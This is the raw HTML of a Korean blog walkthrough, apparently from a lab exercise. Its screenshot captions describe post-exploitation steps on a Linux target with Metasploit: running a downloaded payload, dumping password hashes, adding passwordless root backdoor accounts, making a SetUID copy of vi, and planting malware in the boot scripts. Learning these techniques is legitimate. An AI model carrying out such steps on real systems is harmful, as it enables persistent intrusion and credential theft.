&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;902&quot; data-origin-height=&quot;151&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bm9eVW/btrZmCyFsqa/rMMN8PeUrjHiJ8CgaOJ2xk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bm9eVW/btrZmCyFsqa/rMMN8PeUrjHiJ8CgaOJ2xk/img.png&quot; data-alt=&quot;리눅스에서 사용할 악성 코드 생성&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bm9eVW/btrZmCyFsqa/rMMN8PeUrjHiJ8CgaOJ2xk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbm9eVW%2FbtrZmCyFsqa%2FrMMN8PeUrjHiJ8CgaOJ2xk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;902&quot; height=&quot;151&quot; data-origin-width=&quot;902&quot; data-origin-height=&quot;151&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;리눅스에서 사용할 악성 코드 생성&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;455&quot; data-origin-height=&quot;128&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bVFw18/btrZhSJ8n7J/DnIKt55l0TlTwWZyYe0hT1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bVFw18/btrZhSJ8n7J/DnIKt55l0TlTwWZyYe0hT1/img.png&quot; data-alt=&quot;모든 퍼미션에 x값을 넣어준다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bVFw18/btrZhSJ8n7J/DnIKt55l0TlTwWZyYe0hT1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbVFw18%2FbtrZhSJ8n7J%2FDnIKt55l0TlTwWZyYe0hT1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;455&quot; height=&quot;128&quot; data-origin-width=&quot;455&quot; data-origin-height=&quot;128&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;모든 퍼미션에 x값을 넣어준다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;426&quot; data-origin-height=&quot;139&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dqSEBy/btrZkSosy50/uu9Cuwf5Ee0LmyvJqzYdc0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dqSEBy/btrZkSosy50/uu9Cuwf5Ee0LmyvJqzYdc0/img.png&quot; data-alt=&quot;자동 실행 스크립트를 만들어 준다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dqSEBy/btrZkSosy50/uu9Cuwf5Ee0LmyvJqzYdc0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdqSEBy%2FbtrZkSosy50%2Fuu9Cuwf5Ee0LmyvJqzYdc0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;426&quot; height=&quot;139&quot; data-origin-width=&quot;426&quot; data-origin-height=&quot;139&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;자동 실행 스크립트를 만들어 준다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;691&quot; data-origin-height=&quot;455&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ZSyia/btrZjK5xgRZ/EfdrbT6AoRgWhpTepdpw40/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ZSyia/btrZjK5xgRZ/EfdrbT6AoRgWhpTepdpw40/img.png&quot; data-alt=&quot;공격 대상자 리눅스에서 악성 코드 실행 파일을 ftp로 다운받는다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ZSyia/btrZjK5xgRZ/EfdrbT6AoRgWhpTepdpw40/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FZSyia%2FbtrZjK5xgRZ%2FEfdrbT6AoRgWhpTepdpw40%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;691&quot; height=&quot;455&quot; data-origin-width=&quot;691&quot; data-origin-height=&quot;455&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;공격 대상자 리눅스에서 악성 코드 실행 파일을 ftp로 다운받는다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;537&quot; data-origin-height=&quot;165&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/OwIRv/btrZkzbq8Mh/hAKSaiG7GOonpOeKUqWbgk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/OwIRv/btrZkzbq8Mh/hAKSaiG7GOonpOeKUqWbgk/img.png&quot; data-alt=&quot;다운 받은 악성 코드파일에 퍼미션x 가 사라져서 x를 추가하고 실행한다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/OwIRv/btrZkzbq8Mh/hAKSaiG7GOonpOeKUqWbgk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FOwIRv%2FbtrZkzbq8Mh%2FhAKSaiG7GOonpOeKUqWbgk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;537&quot; height=&quot;165&quot; data-origin-width=&quot;537&quot; data-origin-height=&quot;165&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;다운 받은 악성 코드파일에 퍼미션x 가 사라져서 x를 추가하고 실행한다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;904&quot; data-origin-height=&quot;93&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/tMPd8/btrZlXCUiWW/11vroMS8xpLNGwhocR1hx1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/tMPd8/btrZlXCUiWW/11vroMS8xpLNGwhocR1hx1/img.png&quot; data-alt=&quot;공격 대상자에서 악성코드를 실행하면 미터프리터 환경을 획득 하는 것을 확인 할 수 있다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/tMPd8/btrZlXCUiWW/11vroMS8xpLNGwhocR1hx1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FtMPd8%2FbtrZlXCUiWW%2F11vroMS8xpLNGwhocR1hx1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;904&quot; height=&quot;93&quot; data-origin-width=&quot;904&quot; data-origin-height=&quot;93&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;공격 대상자에서 악성코드를 실행하면 미터프리터 환경을 획득 하는 것을 확인 할 수 있다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;1.&amp;nbsp;기존&amp;nbsp;계정의&amp;nbsp;유저명/&amp;nbsp;해쉬암호&amp;nbsp;추출&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;이제 침투한 공격 대상자 리눅스의 유저명과 암호를 추출해본다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;905&quot; data-origin-height=&quot;711&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/mypck/btrZmDK9ubK/AE4RGQivqtuZEuUPManXKK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/mypck/btrZmDK9ubK/AE4RGQivqtuZEuUPManXKK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/mypck/btrZmDK9ubK/AE4RGQivqtuZEuUPManXKK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fmypck%2FbtrZmDK9ubK%2FAE4RGQivqtuZEuUPManXKK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;905&quot; height=&quot;711&quot; data-origin-width=&quot;905&quot; data-origin-height=&quot;711&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;903&quot; data-origin-height=&quot;281&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/nHWpy/btrZlX3ZHbC/jLFUkspGLk1bHHEfDfhBGK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/nHWpy/btrZlX3ZHbC/jLFUkspGLk1bHHEfDfhBGK/img.png&quot; data-alt=&quot;run post/linux/gather/hashdump 명령을 이용하여 해시값과 계정명을 추출한다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/nHWpy/btrZlX3ZHbC/jLFUkspGLk1bHHEfDfhBGK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FnHWpy%2FbtrZlX3ZHbC%2FjLFUkspGLk1bHHEfDfhBGK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;903&quot; height=&quot;281&quot; data-origin-width=&quot;903&quot; data-origin-height=&quot;281&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;run post/linux/gather/hashdump 명령을 이용하여 해시값과 계정명을 추출한다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;&lt;b&gt;2.&amp;nbsp;백도어&amp;nbsp;계정(UID&amp;nbsp;0),&amp;nbsp;암호가&amp;nbsp;없어야함&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;317&quot; data-origin-height=&quot;177&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/T55no/btrZmCFsoES/hqRE6sMmrQyJUXs6KSzRf0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/T55no/btrZmCFsoES/hqRE6sMmrQyJUXs6KSzRf0/img.png&quot; data-alt=&quot;공격 대상자 리눅스의 shell로 접근하여 UID0, GUID가 root인 백도어 계정을 만들고 계정을 unlock한다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/T55no/btrZmCFsoES/hqRE6sMmrQyJUXs6KSzRf0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FT55no%2FbtrZmCFsoES%2FhqRE6sMmrQyJUXs6KSzRf0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;317&quot; height=&quot;177&quot; data-origin-width=&quot;317&quot; data-origin-height=&quot;177&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;공격 대상자 리눅스의 shell로 접근하여 UID0, GUID가 root인 백도어 계정을 만들고 계정을 unlock한다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;489&quot; data-origin-height=&quot;42&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/lTmJ4/btrZiXj6ETj/PA2JMzocmFnbe5xEzIQhFK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/lTmJ4/btrZiXj6ETj/PA2JMzocmFnbe5xEzIQhFK/img.png&quot; data-alt=&quot;echo 명령으로도 백도어 계정을 만들수 있다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/lTmJ4/btrZiXj6ETj/PA2JMzocmFnbe5xEzIQhFK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FlTmJ4%2FbtrZiXj6ETj%2FPA2JMzocmFnbe5xEzIQhFK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;489&quot; height=&quot;42&quot; data-origin-width=&quot;489&quot; data-origin-height=&quot;42&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;echo 명령으로도 백도어 계정을 만들수 있다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;407&quot; data-origin-height=&quot;137&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/BBRWo/btrZop0eMqC/iLH79zQTLvbOjUxRakUMi0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/BBRWo/btrZop0eMqC/iLH79zQTLvbOjUxRakUMi0/img.png&quot; data-alt=&quot;공격 대상자에서 확인해본 결과 암호가 없는 uid0, gui0인 백도어계정2개가 생성된것을 확인 할 수 있다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/BBRWo/btrZop0eMqC/iLH79zQTLvbOjUxRakUMi0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FBBRWo%2FbtrZop0eMqC%2FiLH79zQTLvbOjUxRakUMi0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;407&quot; height=&quot;137&quot; data-origin-width=&quot;407&quot; data-origin-height=&quot;137&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;공격 대상자에서 확인해본 결과 암호가 없는 uid0, gui0인 백도어계정2개가 생성된것을 확인 할 수 있다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;3. SetUID (vi -&amp;gt; vi2)로 설정&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;377&quot; data-origin-height=&quot;20&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cQKPo4/btrZkyjjgpF/86Knl2h0HEf6Uyit3iAzk0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cQKPo4/btrZkyjjgpF/86Knl2h0HEf6Uyit3iAzk0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cQKPo4/btrZkyjjgpF/86Knl2h0HEf6Uyit3iAzk0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcQKPo4%2FbtrZkyjjgpF%2F86Knl2h0HEf6Uyit3iAzk0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;377&quot; height=&quot;20&quot; data-origin-width=&quot;377&quot; data-origin-height=&quot;20&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;340&quot; data-origin-height=&quot;21&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/eppnUE/btrZoqrjzMs/Y4XKUXAiFDwci7weItqwB1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/eppnUE/btrZoqrjzMs/Y4XKUXAiFDwci7weItqwB1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/eppnUE/btrZoqrjzMs/Y4XKUXAiFDwci7weItqwB1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FeppnUE%2FbtrZoqrjzMs%2FY4XKUXAiFDwci7weItqwB1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;340&quot; height=&quot;21&quot; data-origin-width=&quot;340&quot; data-origin-height=&quot;21&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;미터프리터 환경에서 cp와 chmod 명령어를 이용하여 vi를 복제한 후 SetUID로 설정한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;669&quot; data-origin-height=&quot;155&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cRbo9F/btrZkSou82I/UzOlejtqQSoaKFKWqSYqd0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cRbo9F/btrZkSou82I/UzOlejtqQSoaKFKWqSYqd0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cRbo9F/btrZkSou82I/UzOlejtqQSoaKFKWqSYqd0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcRbo9F%2FbtrZkSou82I%2FUzOlejtqQSoaKFKWqSYqd0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;669&quot; height=&quot;155&quot; data-origin-width=&quot;669&quot; data-origin-height=&quot;155&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;715&quot; data-origin-height=&quot;669&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/EvoLV/btrZjp1GEmE/eDeUnbS7ryqybC2SRhbLzK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/EvoLV/btrZjp1GEmE/eDeUnbS7ryqybC2SRhbLzK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/EvoLV/btrZjp1GEmE/eDeUnbS7ryqybC2SRhbLzK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FEvoLV%2FbtrZjp1GEmE%2FeDeUnbS7ryqybC2SRhbLzK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;715&quot; height=&quot;669&quot; data-origin-width=&quot;715&quot; data-origin-height=&quot;669&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 61.1628%; height: 139px;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr style=&quot;height: 20px;&quot;&gt;
&lt;td style=&quot;width: 10.3488%; height: 20px; text-align: center;&quot;&gt;&lt;b&gt;런레벨&amp;nbsp;&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50.814%; height: 20px; text-align: center;&quot;&gt;&lt;b&gt;의미&lt;/b&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 10.3488%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;init&amp;nbsp;0&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50.814%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;시스템종료&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;(Default&amp;nbsp;X)&lt;/b&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 10.3488%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;init 1&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50.814%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;Single&amp;nbsp;user&amp;nbsp;(Network&amp;nbsp;비활성화,시스템&amp;nbsp;복구모드)&lt;/b&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 10.3488%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;init 2&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50.814%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;Multi&amp;nbsp;user&amp;nbsp;&amp;nbsp;(Network&amp;nbsp;비활성화)&lt;/b&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 10.3488%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;init 3&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50.814%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;Multi&amp;nbsp;user&amp;nbsp;&amp;nbsp;(Network&amp;nbsp;활성화,&amp;nbsp;CLI모드)&lt;/b&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 10.3488%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;init 4&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50.814%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;Unused&amp;nbsp;(reversed,CLI모드,&amp;nbsp;따로&amp;nbsp;사용하라고&amp;nbsp;만들어&amp;nbsp;높은&amp;nbsp;모드)&lt;/b&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 10.3488%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;init 5&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50.814%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;Multi&amp;nbsp;user&amp;nbsp;+&amp;nbsp;X&amp;nbsp;Windows&amp;nbsp;(Network&amp;nbsp;활성화,&amp;nbsp;GUI모드)&lt;/b&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 10.3488%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;init 6&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50.814%; height: 17px; text-align: center;&quot;&gt;&lt;b&gt;재부팅&amp;nbsp;(Default&amp;nbsp;X)&lt;/b&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;865&quot; data-origin-height=&quot;569&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/TujfS/btrZjqTQCB8/uYH2SLZcLYHpsHd4oExyWK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/TujfS/btrZjqTQCB8/uYH2SLZcLYHpsHd4oExyWK/img.png&quot; data-alt=&quot;알파벳이나 숫자가 낮을 수록 런레벨을 실행 하였을 때 우선순위가 높다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/TujfS/btrZjqTQCB8/uYH2SLZcLYHpsHd4oExyWK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FTujfS%2FbtrZjqTQCB8%2FuYH2SLZcLYHpsHd4oExyWK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;865&quot; height=&quot;569&quot; data-origin-width=&quot;865&quot; data-origin-height=&quot;569&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;알파벳이나 숫자가 낮을 수록 런레벨을 실행 하였을 때 우선순위가 높다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;899&quot; data-origin-height=&quot;572&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cDdmgm/btrZkbu9c4a/rkKCbk0RONh0nJXdVMnFyk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cDdmgm/btrZkbu9c4a/rkKCbk0RONh0nJXdVMnFyk/img.png&quot; data-alt=&quot;현재 rc3로 동작하는 공격 대상자 리눅스의 부팅시 실행되는 순위이다. login전 S91과 S99사이에 악성 코드를 심어 준다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cDdmgm/btrZkbu9c4a/rkKCbk0RONh0nJXdVMnFyk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcDdmgm%2FbtrZkbu9c4a%2FrkKCbk0RONh0nJXdVMnFyk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;899&quot; 